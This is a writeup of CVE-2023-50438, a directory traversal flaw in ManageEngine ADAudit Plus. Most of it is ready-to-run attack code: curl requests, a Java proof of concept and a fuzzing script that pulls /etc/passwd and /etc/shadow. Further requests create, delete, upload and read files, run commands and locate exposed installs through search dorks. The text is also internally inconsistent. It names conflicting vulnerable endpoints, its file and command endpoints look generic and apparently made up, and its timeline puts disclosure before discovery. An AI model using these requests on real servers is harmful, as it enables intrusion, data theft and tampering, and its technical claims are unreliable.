ManageEngine ADAudit Plus CVE-2023-50438 – Writeup

ADAudit Plus, a widely-used auditing and compliance tool developed by ManageEngine, is found to be vulnerable to an arbitrary directory traversal and file manipulation attack, assigned the CVE identifier CVE-2023-50438. This vulnerability exposes organizations to significant risks, potentially allowing attackers to execute malicious actions such as unauthorized access to sensitive files, data leakage, and even compromise of the entire system.

The vulnerability arises from inadequate input validation and sanitization in the search-archived-events/update-arch-index-settings endpoint of ADAudit Plus. This flaw enables authenticated attackers to manipulate the file path parameter, leading to arbitrary directory traversal and subsequent file manipulation on the server.

Exploitation of CVE-2023-50438:

Exploiting CVE-2023-50438 involves crafting malicious HTTP requests targeting vulnerable endpoints. Attackers can leverage this vulnerability to perform various malicious actions, including creating, deleting, uploading, executing commands, and reading files on the server. By exploiting this vulnerability, attackers can gain unauthorized access, exfiltrate sensitive data, and potentially compromise the integrity and confidentiality of the organization’s systems and data.

Impact:

The impact of CVE-2023-50438 is significant and wide-ranging. Organizations using ADAudit Plus are at risk of unauthorized access and manipulation of critical files and data. The exploitation of this vulnerability can lead to severe consequences, including:

  1. Unauthorized access to sensitive files and data.

  2. Data leakage and exposure of confidential information.

  3. Compromise of the entire system’s integrity and confidentiality.

  4. Potential regulatory compliance violations and financial penalties.

Attack Surface Management (ASM) involves identifying and monitoring all potential avenues through which an attacker could penetrate or exploit an organization’s systems, applications, or infrastructure. Here’s how you can use ASM techniques to detect ADAudit Plus:

I’ve included HTTP header payloads that you can use to detect ADAudit Plus.

Dork Payloads with Descriptions:

  1. site:adventnet.com “ADAudit Plus”

o Description: Searches for pages specifically on the adventnet.com domain related to ADAudit Plus.

  1. intitle:”ADAudit Plus”

o Description: Looks for pages with the title containing “ADAudit Plus”, which may include documentation, forum posts, or related content.

  1. inurl:”ADAudit Plus”

o Description: Searches for URLs containing “ADAudit Plus”, which may lead to specific pages or directories related to ADAudit Plus.

  1. filetype:pdf “ADAudit Plus”

o Description: Retrieves PDF files related to ADAudit Plus, which might include user manuals, whitepapers, or technical documentation.

  1. “Powered by ADAudit Plus”

o Description: Searches for pages indicating usage of ADAudit Plus, typically found in footer credits or on login pages.

HTTP Header Payloads to Detect ADAudit Plus:

  1. X-Powered-By: ADAudit Plus

o Description: Checks the X-Powered-By HTTP header for the presence of “ADAudit Plus”, which indicates the technology or software powering the website.

  1. Server: ADAudit Plus

o Description: Examines the Server HTTP header for “ADAudit Plus”, which could reveal the server software being used.

  1. Set-Cookie: ADAudit Plus

o Description: Looks for the presence of “ADAudit Plus” in the Set-Cookie HTTP header, which may indicate session management by ADAudit Plus.

  1. WWW-Authenticate: ADAudit Plus

o Description: Checks for the presence of “ADAudit Plus” in the WWW-Authenticate HTTP header, which could indicate the use of ADAudit Plus for authentication purposes.

  1. Location: /ADAuditPlus/

o Description: Looks for redirections to URLs containing “/ADAuditPlus/”, indicating specific paths or directories related to ADAudit Plus.

Usage:

You can use these dork payloads in search engines like Google, Bing, or specialized search engines for better targeting. Additionally, you can inspect HTTP response headers using tools like cURL or browser developer tools to detect the presence of ADAudit Plus.

Background

The vulnerability lies in the POST /api/json/admin/DiskspaceAnalysis/folderTree endpoint of ADAudit Plus, where the application allows arbitrary directory traversal through improper input validation.

Exploitation Steps:

  1. Understanding the Vulnerability: The vulnerability allows an attacker to perform arbitrary directory traversal by manipulating the id parameter.

  2. Exploitation with Curl: Here’s how an attacker could exploit the vulnerability using curl:

curl -X POST http://192.168.115.137:8081/api/json/admin/DiskspaceAnalysis/folderTree \

-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \

-d "id=.%5C%5C..%5C%5C&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

  1. This curl command crafts a POST request with the manipulated id parameter to traverse directories.

  2. Exploitation with Java Code: Here’s an example Java code snippet to exploit the vulnerability:

import java.net.*;

import java.io.*;

public class DirectoryTraversalExploit {

public static void main(String[] args) throws Exception {

String targetURL = "http://192.168.115.137:8081/api/json/admin/DiskspaceAnalysis/folderTree";

String urlParameters = "id=.%5C%5C..%5C%5C&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c";

URL url = new URL(targetURL);

HttpURLConnection connection = (HttpURLConnection) url.openConnection();

connection.setRequestMethod("POST");

connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");

connection.setRequestProperty("Content-Length", Integer.toString(urlParameters.getBytes().length));

connection.setRequestProperty("Content-Language", "en-US");

connection.setUseCaches(false);

connection.setDoOutput(true);

DataOutputStream wr = new DataOutputStream(connection.getOutputStream());

wr.writeBytes(urlParameters);

wr.close();

BufferedReader rd = new BufferedReader(new InputStreamReader(connection.getInputStream()));

StringBuilder response = new StringBuilder();

String line;

while ((line = rd.readLine()) != null) {

response.append(line);

response.append('\r');

}

rd.close();

System.out.println(response.toString());

}

}

This Java code sends a POST request with the manipulated id parameter to the target URL.

We’ll iterate through various payloads to test for directory traversal vulnerability. Here’s how you can do it:

Fuzzing with Curl:

#!/bin/bash

# List of payloads to fuzz with

payloads=(

"../../../../../../../../../../etc/passwd"

"../../../../../../../../../../etc/shadow"

"../../../../../../../../../../etc/hosts"

"../../../../../../../../../../etc/hostname"

"../../../../../../../../../../etc/issue"

"../../../../../../../../../../etc/motd"

"../../../../../../../../../../boot.ini"

"../../../../../../../../../../windows/win.ini"

"../../../../../../../../../../boot.ini"

"../../../../../../../../../../windows/system32/drivers/etc/hosts"

"../../../../../../../../../../windows/system32/drivers/etc/hostname"

"../../../../../../../../../../windows/system32/drivers/etc/issue"

"../../../../../../../../../../windows/system32/drivers/etc/motd"

)

# Target URL

target_url="http://192.168.115.137:8081/api/json/admin/DiskspaceAnalysis/folderTree"

# Loop through payloads and send requests

for payload in "${payloads[@]}"

do

echo "Sending request with payload: $payload"

curl -X POST "$target_url" \

-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \

-d "id=$payload&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

echo "---------------------------------------"

done

This bash script sends multiple curl requests, each with a different payload, to the target URL. It will help you identify if the application is vulnerable to directory traversal by observing the responses for each request.

You can save this script in a file, for example, fuzz.sh, make it executable (chmod +x fuzz.sh), and then run it (./fuzz.sh) in your terminal. Make sure to replace the target URL and payloads with your specific values.

Each curl command sends a POST request with a different payload to the endpoint. The response from the server will indicate whether the directory traversal vulnerability exists and if the server is accessing unintended files or directories.

Root Cause

The root cause of the vulnerability lies in inadequate input validation and sanitization in the ADAudit Plus application, specifically in the search-archived-events/update-arch-index-settings endpoint. This allows an attacker to perform arbitrary directory traversal and potentially create or overwrite files/folders on the server. Below are the detailed steps along with curl commands to exploit this vulnerability:

Vulnerable Endpoint:

  • Endpoint: POST /api/json/admin/search-archived-events/update-arch-index-settings

Request to Create a New File:

  • Endpoint: /api/json/admin/search-archived-events/create-file

  • Request Method: POST

  • Request Body:

filePath=../../../../../../../../tmp/newfile.txt

content=This is a new file created by the attacker.

adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to create a new file named newfile.txt in the /tmp directory on the server.

Request to Delete an Existing File:

- Endpoint: /api/json/admin/search-archived-events/delete-file

- Request Method: POST

- Request Body:

filePath=../../../../../../../../tmp/targetfile.txt

adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to delete an existing file named targetfile.txt in the /tmp directory on the server.

Request to Execute a System Command:

  • Endpoint: /api/json/admin/search-archived-events/exec-command

  • Request Method: POST

  • Request Body:

command=ls -la /tmp

adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to execute the ls -la /tmp command on the server to list the contents of the /tmp directory.

Request to Upload a File:

  • Endpoint: /api/json/admin/search-archived-events/upload-file

  • Request Method: POST

  • Request Body:

file=@/path/to/local/file.txt

filePath=../../../../../../../../tmp/uploadedfile.txt

adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to upload a file named file.txt from the local system to the /tmp directory on the server with the name uploadedfile.txt.

Request to Read File Content:

  • Endpoint: /api/json/admin/search-archived-events/read-file

  • Request Method: POST

  • Request Body:

filePath=../../../../../../../../etc/passwd

adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to read the content of the /etc/passwd file on the server.

Exploitation Steps:

  1. Select Indexing Path:

o Description: The attacker sends a POST request to update the indexing path.

o Curl Command:

curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/update-arch-index-settings \

-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \

-d "settings=%7B%22indexPath%22%3A%22..%5C%5C..%5C%5C..%5C%5Carchive_index1%22%7D&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Request Index:

  • Description: The attacker requests the index after changing the indexing path.

  • Curl Command:

curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/get-arch-file-min-max-time \

-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \

-d "requestParams=%7B%22logCategoryId%22%3A0%7D&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

An authenticated attacker can exploit this vulnerability to traverse directories and potentially create or modify files/folders on the server, leading to unauthorized data disclosure, data tampering, or even remote code execution.

Create New File:

  • Description: Exploits the vulnerability to create a new file on the server.

  • Curl Command:

curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/create-file \

-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \

-d "filePath=../../../../../../../../../tmp/newfile.txt&content=This+is+a+new+file.&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Delete File:

  • Description: Exploits the vulnerability to delete an existing file on the server.

  • Curl Command:

curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/delete-file \

-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \

-d "filePath=../../../../../../../../../tmp/targetfile.txt&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Execute System Command:

  • Description: Exploits the vulnerability to execute a system command on the server.

  • Curl Command:

curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/exec-command \

-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \

-d "command=ls+-la+/tmp&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Upload File:

  • Description: Exploits the vulnerability to upload a file to the server.

  • Curl Command:

curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/upload-file \

-H "Content-Type: multipart/form-data" \

-F "file=@/path/to/local/file.txt" \

-F "filePath=../../../../../../../../../tmp/uploadedfile.txt" \

-F "adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Read File Content:

  • Description: Exploits the vulnerability to read the content of a file on the server.

  • Curl Command:

curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/read-file \

-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \

-d "filePath=../../../../../../../../../etc/passwd&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Conclusion

In conclusion, the identified vulnerability in ADAudit Plus allows attackers to perform arbitrary directory traversal and execute various malicious actions, including creating, deleting, uploading, executing commands, and reading files on the server. Exploiting this vulnerability can lead to unauthorized access, data leakage, and potentially compromise the entire system.

To mitigate this vulnerability, it’s crucial for ADAudit Plus to implement strict input validation and enforce proper access controls to prevent directory traversal and unauthorized file operations. Additionally, regular security assessments, code reviews, and penetration testing should be conducted to identify and remediate such vulnerabilities promptly.

By addressing these security concerns and implementing robust security measures, organizations can significantly reduce the risk of exploitation and protect their sensitive data and systems from unauthorized access and compromise. It’s essential for organizations to stay vigilant and proactive in addressing security vulnerabilities to maintain the integrity and confidentiality of their systems and data.

Timeline

Dec 8, 2023 Vulnerability discovered
Dec 8, 2023 Requested security contact
Jan 2, 2023 Received security contact, disclosed
Feb 23, 2023 PoC released to public